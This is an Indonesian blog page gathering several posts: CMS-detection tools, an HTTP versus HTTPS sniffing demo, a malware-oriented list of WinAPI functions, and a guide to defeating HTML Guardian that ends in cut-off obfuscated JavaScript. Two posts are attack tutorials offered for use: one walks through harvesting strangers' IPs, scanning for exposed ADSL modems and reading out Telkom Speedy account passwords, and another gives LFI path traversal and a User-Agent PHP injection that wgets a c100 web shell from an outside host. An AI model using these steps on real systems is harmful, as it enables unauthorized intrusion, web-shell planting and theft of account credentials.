Mengetahui Jenis CMS Suatu Website

• 3
  inShare
• 0

Mungkin kita sering penasaran CMS apa sih yang digunakan sebuah website. Apakah benar menggunakan CMS jenis tertentu atau memang website nya menggunakan code buatan sendiri. Di bawah ini ada beberapa cara yang bisa digunakan mulai dari plugin hingga website yang menyidakan layanan tersebut.
 

1.wappalyzer

Wappalyzer adalah ekstensi browser yang mengungkap teknologi yang digunakan sebuah website. Mendeteksi content management systems (CMS) , web shops, web servers, JavaScript frameworks, analytics tools dan banyak lagi. Ratusan CMS dapat di-identifikasi oleh  addon ini, tersedia untuk Mozilla Firefox dan Google Chrome.

Get Wappalyzer from the Firefox add-ons page
Get Wappalyzer from the Chrome Web Store

2. Chrome Sniffer

Mendeteksi aplikasi web dan librari javascript yang berjalan di situs . Ekstensi ini akan membantu web developer untuk memeriksa framework / CMS dan library javascript yang berjalan pada sebuah situs. Sebuah ikon akan muncul pada address bar mengindikasikan framework yang digunakan.
Saat ini, ekstensi ini dapat mendeteksi lebih dari 100 CMS populer dan library javascript. CMS lainnya akan ditambahkan dalam rilis mendatang. Untuk informasi lebih lanjut dan download bisa melalui link ini.

3. Firebug

Firebug terintegrasi dengan Firefox hampir sama dengan Wappalyzer . Anda dapat mengedit, debug, dan memonitor CSS, HTML, dan JavaScript secara realtime dalam setiap halaman web. Akan tetapi Firebug memiliki fungsi yang lebih banyak karena diciptakan untuk mempermudah pekerjaan bagi web developer.


Untuk menambahkan addon ini ke Mozilla Firefox anda bisa langsung menuju ke link ini.

4. Guess.scritch.org CMS detektor

Mendeteksi CMS, framework dan teknologi yang digunakan oleh sebuah situs web.

Alat ini akan menganalisa website dan  mendeteksi plaform, bahasa, framework dan teknologi lain yang digunakan untuk situs web apapun. Tidak ada plugin atau ekstensi yang dibutuhkan dan dapat bekerja dengan browser apapun!

5. Builtwith.com

Hampir sama seperti Guess.scritch.org ,  Builtwith.com juga merupakan sebuah situs CMS detektor yang mendeteksi CMS, framework dan teknologi yang digunakan oleh sebuah situs web. akan tetapi analisa Builtwith.com  lebih mendetail.

READ MORE - Mengetahui Jenis CMS Suatu Website

Perbedaan HTTP dan HTTPS

HTTP adalah dasar komunikasi data untuk World Wide Web (WWW). Setiap kali kita membuka website / halaman web kita akan menggunakan protokol ini.

Sisi client meminta sisi server untuk membuka komunikasi pada port 80, port terbuka sisi server 80 dan di sisi client port acak terbuka.

Berikut ini adalah gambar ketika aku membuka http://www.kaskus.us dan melihat port yang terbuka menggunakan netstat-an.

Seperti yang bisa kita lihat dari gambar, komputer klien membuka port lokal acak dan port terbuka 80 pada sisi server.

Apakah HTTP (Hyper Text Transfer Protocol) Aman?

Untuk menjawab pertanyaan ini, mari kita lihat eksperimen di bawah ini.

Dalam percobaan ini, ada 2 orang dalam satu jaringan nirkabel dan BadGuy NiceGuy. NiceGuy mencoba untuk membuka http://friendster.com kemudian login ke dalamnya. Di tempat berbeda, BadGuy dalam jaringan nirkabel yang sama dengan NiceGuy seperti yang ditunjukkan pada gambar di bawah:

BadGuy menggunakan Wireshark untuk menangkap data paket semua ditransmisikan ke / dari titik akses. Dalam hal ini BadGuy hanya mengumpulkan dan melihat data paket yang dikirim oleh orang lain.

Berikut adalah gambar ketika NiceGuy memasukkan username (email) dan password di friendster.com

Dan kemudian data berhasil ditangkap oleh BadGuy menggunakan Wireshark dengan Username:niceguy@yahuu.com dan password: heremypass.

Kesimpulan HTTP

Data paket yang dikirim menggunakan HTTP tidak terenkripsi, siapapun dapat melihat data dalam teks biasa seperti BadGuy lakukan. Itulah mengapa tidak menggunakan HTTP untuk perbankan atau transaksi di internet, dan juga itu tidak dianjurkan jika Anda membuka website halaman login yang menggunakan HTTP pada jaringan publik seperti area hotspot nirkabel.

HTTPS

HTTPS adalah kombinasi dari Hyper Text Transfer Protocol dan Secure Socket Layer protokol (SSL) / Transport Layer Security (TLS) untuk menyediakan komunikasi terenkripsi antara web server dan klien. Biasanya HTTPS digunakan untuk internet banking, transaksi pembayaran, halaman login, dll

Protokol ini menggunakan port 443 untuk komunikasi. Website yang sudah menggunakan protokol ini GMail.com, dan juga situs-situs lain seperti PayPal, Amazon, dll.

Mari kita lihat hubungan antara komputer kita dan web server ketika kita membuat koneksi menggunakan HTTPS menggunakan netstat-an.

Seperti yang bisa kita lihat dari gambar, komputer klien membuka port lokal acak dan port terbuka 443 pada sisi server.

Apakah HTTPS (Hyper Text Transfer Protocol Secure) Aman?

Untuk menjawab pertanyaan ini, mari kita lihat eksperimen di bawah ini. Dalam percobaan ini, ada 2 orang dalam satu jaringan nirkabel dan BadGuy NiceGuy.

NiceGuy mencoba untuk membuka http://gmail.com kemudian login ke dalamnya. Di tempat berbeda, BadGuy dalam jaringan nirkabel yang sama dengan NiceGuy seperti yang ditunjukkan pada gambar di bawah:

Ketika BadGuy mencoba untuk menangkap data paket semua untuk / dari titik akses, maka akan berbeda bila menggunakan koneksi HTTPS untuk NiceGuy.

Untuk keterangan lebih jelas, mari kita lihat gambar di bawah ini ketika Input NiceGuy username dan password pada halaman login Gmail.

Seperti yang dapat Anda lihat dalam gambar di atas, itu menggunakan https untuk koneksi antara klien dan server web. Kemudian kita akan melihat apa yang BadGuy lakukan setelah NiceGuy menggunakan HTTPS untuk koneksi nya.

BadGuy menyukai tools seperti Wireshark, jadi dia mencoba lagi untuk menangkap data dan berharap ada sesuatu yang menarik di sana.

BadGuy tidak menemukan data polos, setiap data kirim ke / mengirim dari server dienkripsi. Gambar di atas adalah informasi login (mungkin) data yang telah ditangkap oleh BadGuy, tapi saya pikir BadGuy tidak dapat mematahkan data dienkripsi hanya dalam beberapa hari / bulan / tahun atau mungkin kita bisa disebut “tidak mungkin” (kita masih tidak tahu kapan waktu yang mungkin untuk masuk ke dalamnya).

Kesimpulan HTTPS

Data paket dikirim menggunakan HTTPS dienkripsi, orang tidak dapat melihat data paket dalam jaringan publik. Itu sebabnya HTTPS biasanya digunakan untuk perbankan atau transaksi di internet, dan halaman juga login atau halaman lain perlu untuk mengenkripsi data.

Semoga memperjelas kita semua 

 Sumber :

READ MORE - Perbedaan HTTP dan HTTPS

Teknik Hacking Modem ADSL dan Account Speedy

Langkah Pertama
Buka aplikasi mIRC? pilih server Dalnet? dan koneksikan. Kemudian join di beberapa channel itu terserah anda, dalam hal ini gw mencari target di channel #balikpapan dan #samarinda. Sesudah anda join klik Dalnet Status, kemudian ketikkan perintah ?/who #nama channel? tanpa tanda petik. Maka akan timbul beberapa teks. Biasanya IP dari Telkom Speedy angka awalnya adalah 125.xxx.xxx.xxx, IP inilah yang akan menjadi target scanning. Lihat gambar dibawah ini.

Langkah Kedua

Buka aplikasi Advanced Port Scanner v1.0 Beta 1, kemudian cari sebuah IP contoh 125.160.33.41 ini merupakan sebuah IP TelkomSpeedy. Tetapi bukan IP itu yang akan kita scanning melainkan mengambil range IP dari 125.160.33.1-125.160.33.255, jadi angka yang diambil hanya 125.160.33. bukan 125.160.33.41 dan range yang dipake dari 1-255. Lihat hasil dari scanning tersebut.

Langkah Ketiga

Tes IP tersebut dengan menggunakan web browser, disini gw memakai Mozilla Firefox kemudian masukan IP tersebut. apabila timbul pop up login berarti modem ADSL tersebut bisa di remote dari luar. Selanjutnya berbekal kemampuan untuk menembus password dari modem sebaiknya anda mencari tutorial mengenai beberapa password default sebuah modem dengan merk-merk yang berbeda..

Gambar diatas merupakan login dari modem PROLINK type H9200.

Ini merupakan tampilan dari modem Prolink H920. Kemudian Pada kolom WAN Interfaces klik ppp-0 seperti yang terlihat pada gambar. Kemudian klik edit untuk melihat konfigurasi dari modem sekaligus untuk mencari account telkomspeedy.

Maka kita akan melihat tampilan seperti dibawah ini:

Untuk melihat password, cukup dengan klik kanan pada pop up diatas view page source. Kemudian cari kata passwd. Lihat hasil pada gambar berikut:

Dari hasil diatas dapat dicoba di situs TelkomSpeedy untuk menguji account yang telah gw dapat. Accountnya adalah 161101201848@telkom.net dan passnya tetap saya hidden kan demi menjaga privacy yang punya account.

READ MORE - Teknik Hacking Modem ADSL dan Account Speedy

Tanam Shell via LFI

Dalam tutorial hacking kali ini saya akan coba mengimplementasikan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ.

1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.

contoh : http://site.com/info.php?file=news.php

2. coba kita ganti “news.php” dengan “../../../”.

contoh : http://site.com/info.php?file=../../../

lalu kita mendapat error, seperti berikut…

Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.

contoh : http://site.com/info.php?file=etc/passwd
Tetapi kita masih mendapat error seperti berikut :

Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

bagaimana jika kita naikan directorynya ?
mari kita coba…

contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd

Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin

3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”

contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ

Jika anda mendapatkan yang seperti ini :

DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN= gunslinger@site.com SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80

Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD

4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?file=../../../../../../../../../proc/self/environ”
lalu pada user-agent isikan dengan kode berikut :

<?system(’wget http://r57.gen.tr/c100.txt -O shell.php’);?>

atau

<?exec(’wget http://r57.gen.tr/c100.txt -O shell.php’);?>

lalu submit.

5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.

http://www.site.com/shell.php

READ MORE - Tanam Shell via LFI

Kumpulan Fungsi WinAPI Pada Malware

Virus, Worm, Trojan, Spyware dan sebagainya yang termasuk kategori Malware atau malicious software mungkin sering kita temui dalam aktivitas berkomputer sehari-hari menyebalkan memang jika menemukannya dalam sistem kita [atau memang sengaja di ternak karena hobi?], tapi bagi anda yang tertarik dengan malware atau ingin membuatnya, berikut daftar beberapa fungsi-fungsi API yang sering dipakai oleh malware dalam aksinya beserta Link referensi dari MSDN. yang tentunya lengkap dengan syntak yg digunakan dan parameter yang dipakai pada setiap fungsinya.

Catatan: beberapa fungsi API dibawah ini, ada kemungkinan juga dipakai pada software biasa.

Fungsi-Fungsi Yang Digunakan Malware

——————–
GetWindowsDirectory
——————–
Mendapatkan path lengkap direktori windows,sehingga malware bisa mengcopy dirinya
sendiri ke direktori windows
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724454(v=vs.85).aspx

———-
RegOpenKey
———-
Fungsi untuk Membuka key registri untuk dibaca dan dimanipulasi
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724895(v=vs.85).aspx

—————-
GetAsyncKeyState
—————-
Digunakan untuk menentukan apakah key atau tombol tertentu sedang ditekan. Malware
yang menggunakan fungsi ini disebut sebagai keylogger [perekam ketikkan].
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms646293(v=vs.85).aspx

————-
GetHostByName
————-
Digunakan untuk melakukan lookup DNS pada host tertentu sebelum membuat
koneksi IP ke host remote.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms738524(v=vs.85).aspx

———–
GetHostName
———–
Mengambil nama host dari komputer. Malware menggunakan gethostname sebagai bagian dari pencurian
informasi dari korban.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms738527(v=vs.85).aspx

———–
GetKeyState
———–
Digunakan oleh keylogger untuk mendapatkan status key tertentu pada keyboard.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms646301(v=vs.85).aspx

—————–
GetModuleFileName
—————–
Mendapatkan nama file secara lengkap dari sebuah modul yang dimuat dalam proses saat ini.
Malware dapat menggunakan fungsi ini untuk memodifikasi atau menyalin file di saat menjalankan proses.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms683197(v=vs.85).aspx

————————
CreateToolhelp32Snapshot
————————
Digunakan untuk membuat snapshot dari proses yang sedang berjalan berikut module atau thread pada proses tersebut
Malware sering menggunakan fungsi ini untuk memonitoring apa ada proses yang membahayakan dirinya,
sehingga malware dapat men-terminatenya dan lainnya
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682489(v=vs.85).aspx

————
ShellExecute
————
Digunakan untuk mengeksekusi program lain
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/bb762153(v=vs.85).aspx

—————–
URLDownloadToFile
——————
untuk men-download file dari server web dan menyimpannya ke dalam harddisk.
malware yang menggunakan fungsi ini dikenal sebagai downloader
Link : http://msdn.microsoft.com/en-us/library/ms775123(v=vs.85).aspx

————
GetVersionEx
————
Mendapatkan informasi tentang versi Windows yangsedang digunakan.
Hal ini dapat digunakan sebagai bagian dari pncurian informasi korban atau untuk mengatur
fungsi mana yang cocok diterapkan untuk korban
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724451(v=vs.85).aspx

————–
GetProcAddress
————–
Mengambil address dari suatu fungsi dalam DLL yang telah dimuat ke memori. Digunakan untuk
mengimpor fungsi dari DLL lain selain fungsi yang telah diimpor dalam file header PE.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms683212(v=vs.85).aspx

—————————-
Process32First/Process32Next
—————————-
Digunakan untuk memulai proses pencarian dari panggilan sebelumnya yaituCreateToolhelp32Snapshot.
untuk menemukan suatu proses tertentu untuk proses injeksi atau terminate
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms684834(v=vs.85).aspx

———–
OpenProcess
———–
Membuka handle untuk proses lain yang berjalan pada sistem.handle ini
dapat digunakan untuk membaca dan menulis ke memori proses lain atau untuk menginjeksi
kode ke proses lainnya.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms684320(v=vs.85).aspx

————–
RegisterHotKey
————–
Digunakan untuk mendaftarkan handle untuk diberitahu kapan saja korban memasukkan tertentu
kombinasi tombol (seperti CTRL+ALT+Y),
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms646309(v=vs.85).aspx

—————————–
FindFirstFile / FindNextFile
—————————–
Digunakan untuk mencari sebuah file melalui direktori yang cocok dengan nama atau kondisi tertentu
dan bisa juga untuk menghitung atau mengkalkulasi file yang akan dijadikan target infeksi
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa364418(v=vs.85).aspx

————-
FindResource
————-
Digunakan untuk menemukan sumber daya/resource dalam sebuah DLL yang dieksekusi atau telah dimuat,
Malware menggunakan resource untuk menyimpan string, informasi konfigurasi, atau file berbahaya.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms648042(v=vs.85).aspx

————
LoadResource
————
mengeluarkan resource dari sebuah file PE ke dalam memori. Malware kadang-kadang menggunakan
resource untuk menyimpan string, konfigurasi informasi, atau muatan berbahaya lainnya
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms648046(v=vs.85).aspx

———-
FindWindow
———-
digunakan untuk mencocokan nama window dari sebuah proses dengan list atau string tertentu
misal jika ditemukan nama window dari AV yang bernama AntiVirus maka malware akan berusaha
mn-terminate proses AV tersebut
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms633499(v=vs.85).aspx

———–
GetTempPath
———–
Mendapatkan path file sementara yang dibuat atau akan dibuat.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa364992(v=vs.85).aspx

—————-
SetWindowsHookEx
—————-
Menetapkan fungsi hook yang akan dijalankan setiap kali suatu event tertentu dipanggil.
Umumnya digunakan dengan keyloggers dan spyware,
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms644990(v=vs.85).aspx

———-
CreateFile
———-
Membuat file baru atau membuka file yang sudah ada.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx

—————–
CreateFileMapping
—————–
Membuat buffer untuk mapping file yang memuat file ke memori dan
membuatnya dapat diakses melalui alamat memori. Biasanya malware tipe launcher, loader, dan injector
menggunakan fungsi ini untuk membaca dan memodifikasi file PE.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa366537(v=vs.85).aspx

———–
CreateMutex
———–
Fungsi yang dapat digunakan oleh malware untuk membuat mutex,
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682411(v=vs.85).aspx

————-
CreateProcess
————-
fungsi yang digunakan malware untuk Membuat atau menjalankan proses baru.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx

————-
CreateService
————-
Biasanya malware Membuat service yang dapat membuat dirinya berjalan pada saat boot berlangsung,tanpa
perlu memanipulasi registry
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682450(v=vs.85).aspx

Tehnik atau Fungsi Khusus Pada Malware

Anti Debugging

—————–
IsDebuggerPresent
—————–
Cek untuk melihat apakah proses saat ini sedang di debug, fungsi ini sebagai bagian dari
teknik anti-debugging.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms680345(v=vs.85).aspx

—————–
OutputDebugString
—————–
menghasilkan Output string ke debugger jika sedang dalam debug.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa363362(v=vs.85).aspx

————————–
CheckRemoteDebuggerPresent
————————–
Fungsi untuk melihat atau melakukan cek apakah proses tertentu atau proses diri sendiri sedang di debug.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms679280(v=vs.85).aspx
=======================================================
Lainnya,seperti akses internet,jaringan dan sebagainya
=======================================================

———————
AdjustTokenPrivileges
———————
Digunakan untuk mengaktifkan atau menonaktifkan hak akses tertentu pada proses. Biasanya Malware yang
melakukan injeksi pada proses sering memanggil fungsi ini untuk mendapatkan hak akses tambahan.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa375202(v=vs.85).aspx

——
BitBlt
——
Digunakan untuk menyalin data grafis dari satu perangkat ke perangkat lainnya.
Spyware kadang-kadang menggunakan fungsi ini untuk menangkap screenshot. Fungsi ini sering
ditambahkan oleh compiler sebagai bagian dari kode perpustakaan.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/dd183370(v=vs.85).aspx

———————–
GetSystemDefaultLangId
———————–
Mendapatkan pengaturan default bahasa untuk sistem. Hal ini dapat digunakan
untuk menyesuaikan menampilkan dan nama file, sebagai bagian dari survei dari korban
yang terinfeksi, atau dengan malware “patriotik” yang mempengaruhi sistem hanya dari daerah atau negara
tertentu.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/dd318120(v=vs.85).aspx

————-
NetShareEnum
————
Digunakan untuk menghitung atau kalkulasi jaringan yang di shared.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/bb525387(v=vs.85).aspx

——————–
NtQueryDirectoryFile
——————–
Mendapatkan informasi tentang file dalam direktori. Rootkit biasanya menghubungkan
fungsi ini untuk menyembunyikan file.
Link : http://msdn.microsoft.com/en-us/library/windows/hardware/ff556633(v=vs.85).aspx

————–
VirtualAllocEx
————–
Sebuah rutinitas memori-alokasi yang dapat mengalokasikan memori dalam proses remote.
Malware menggunakan VirtualAllocEx sebagai bagian dari proses injeksi.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa366890(v=vs.85).aspx

—————-
VirtualProtectEx
—————-
Perubahan perlindungan pada daerah memori. Malware dapat menggunakan ini
berfungsi untuk mengubah bagian read-only dari memori untuk dieksekusi.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa366899(v=vs.85).aspx

——————
WriteProcessMemory
——————
Digunakan untuk menulis data ke proses remote. Malware menggunakan WriteProcessMemory
sebagai bagian dari proses injeksi.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms681674(v=vs.85).aspx

————
GetTickCount
————
Mengambil jumlah milidetik sejak boot berlangsung. Fungsi ini
kadang-kadang digunakan untuk mengumpulkan informasi waktu.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724408(v=vs.85).aspx

—————-
InternetOpenUrl
—————-
Membuka URL tertentu untuk koneksi menggunakan FTP, HTTP, HTTPS atau.
URL
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa385098(v=vs.85).aspx

—————-
InternetReadFile
—————-
Membaca data dari URL yang sebelumnya dibuka.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa385103(v=vs.85).aspx

—————–
InternetWriteFile
—————-
Menulis data ke URL yang sebelumnya dibuka.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa385128(v=vs.85).aspx

————–
IsWoW64Process
————–
Digunakan oleh proses 32-bit untuk menentukan apakah proses yang berjalan itu adalah proses 64-bit
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms684139(v=vs.85).aspx

——————————
Wow64DisableWow64FsRedirection
——————————
Menonaktifkan File redirection yang terjadi di 32-bit file yang dimuat pada sistem 64-bit.
Jika aplikasi 32-bit membuat file ke \Windows\System32 setelah memanggil fungsi ini,
maka akan membuat file secara tepat ke \Windows\System32 bukan diarahkan ke \Windows\SysWOW64.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa365743(v=vs.85).aspx

READ MORE - Kumpulan Fungsi WinAPI Pada Malware

Membongkar Proteksi HTML Guardian

Banyak pemilik situs tidak ingin isi situsnya dibajak orang lain. Bermacam-macam cara untuk menghindari pembajakan. Ada yang menggunakan javascript untuk men-disable klik kanan. Cara ini sangat mudah diatasi, cukup dengan mematikan javascript saja. Dalam artikel ini saya akan menunjukkan cara membongkar proteksi html guardian, yaitu software untuk mengenkrip html source agar tidak dicuri orang lain.

Javascript-based Encryption

Cara yang lebih baik adalah dengan menggunakan enkripsi. HTML Guardian (HG) adalah salah satu software yang populer untuk melindungi html dengan enkripsi. Html yang dilindungi dengan HG tidak bisa lagi dibaca dengan mata telanjang (view source). Halaman html yang tadinya rapi, mendadak menjadi kacau balau tak terbaca, penuh dengan kode javascript dan karakter string aneh.

Sebenarnya bagaimana cara kerja HG? Cara kerjanya sederhana. Ketika halaman yang telah dienkrip dengan HG di buka, maka kode javascript yang ada di dalamnya akan melakukan dekripsi menjadi kode html kembali. Kode html ini kemudian ditulis lagi ke browser. Kode html yang telah di-dekrip ini hanya tersimpan di memori browser, tidak di file, sehingga ketika orang mencari di kumpulan file cache tidak ditemukan. Dilihat dengan view source pun tidak akan terbaca.

Generated Source

halaman demo

Dari cara kerjanya, bisa kita ambil kesimpulan bahwa plain-text html nya sebenarnya tersedia, namun hanya beredar di memori browser. Jadi ketika javascript dijalankan, dia akan menghasilkan source, source ini lah yang disebut dengan Generated Source yang disimpan di memori browser.

Khusus pengguna Firefox, telah tersedia addon yang sangat ampuh, yaitu Web Developer. Dengan addon ini, dengan sekali klik saja kita bisa mendapatkan generated source yang tersimpan di memori browser.

Mari kita coba membongkar proteksi HG di halaman demonstrasi. Halaman ini memang khusus dibuat untuk menunjukkan fitur-fitur HG.

Bila kita view source halaman demo tersebut, maka yang kita dapatkan hanyalah kode html dan javascript. Semua konten htmlnya dimasukkan ke dalam kode javascript. Kode javascript untuk contoh demo tersebut adalah sebagai berikut:

1 2 3 4 5

<script type="text/javascript"> //<![CDATA[ l1l=document.all;var naa=true;ll1=document.layers;lll=window.sidebar;naa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');naa|=lII;O0O0=new Array();O0O0[0]='<!DOCTYPE HTML PUBLIC "-//W3C~DTD~ ~~\r4.01 Transitional~EN"><html~9head~9script>ev~3(une~Eape(\'f~Pct%69~1%20\\161~d71%36~a8~a9%7B~]9f~n~d67indo~r7~aE~r3i~d44~]5~]2}1r~p~r~t76}}~b~y~g1~i~k}3D~a}2}}1y~k~o}St~G~]Eg}~]6r~6} 43h}~y2%}8~]F~]} 6}2})~j33~aC~k}H0}3B}}157}8i~k} 3}O}Q}Z~ ~k}=}I~k}3}fB}Z2~t}k}~s}}\'3}"~t}~r}}3~o7}\\B~~c~y}}6}\n}.~y} 2Ew}<}Z7}C}E}z~j7~q}r}n} }{~k}R~e}w}H~m}F}PB\'))</~E~G~I~D~F~H~J~,p=\'This page requi|:|3a b}4wser v|G~-~1 3~% o|H~Qw|G !\';dl=}~ument.lay|K;oe=w~|~~w.o~U~*?1:0|Za|]oc|_|a|c~3l&&!|j;|7|{|}|`|b.|7tEle{tById;|E|l|no|p~-debar?},ue:f~3|F;izN=~2vigat|R.u|FrA|7{{7L{|GCa|F().|nexOf~W~Qt~S~U| >=0{%r{\'{){+e{-{N|E{!{.N){|<og|\\\'iuy\'};~M|Hmsg|.|Y~Yn~[~0n ~Qm{G{|:tur{}{&e{p|m~}{|q~Qr}4|H={~{{^(da{e|^{zd~*gst{#t={y{{|Mzzz{}{*l|F{pz&~/|McIEz({tg);z*z z-z/;z1{| cczz |zc~1t{K~<|au=z4E;|FtTi|`out("zF{G",~b0){pzazgzB~Zz2{}cNS(e{ei{N|[|||Ezt{Ne.w|1ch==2zxz}ziyy3{ez8{uz;z=z,{\\}yz|[z|||~{c~Tz|:E|J|bs(y zJMOUSE~W{d|Zyz~1mz\\|F|onzSzp}ez.e{zI{y2y4eu|-zoS{py?|c~1zL|bzO{zR|T Fzl{|z_yz?{\\"z;zu(|j{ezC|M}4zrz{zry!|cbz]{7y7y{e~3|Gz^\' | z<ey{}0{pyWzyHy0zJyA{:ey6=}4z0yT|Mu0(zzyuz+yXy<x{zzm u1ycxyvzr.z"r{x |6Na|`!{1ul{&z}xxz"gx!|`.|F{#y~W^(IN~T|TEXTAREA|BUTTON|y*LE~)$| 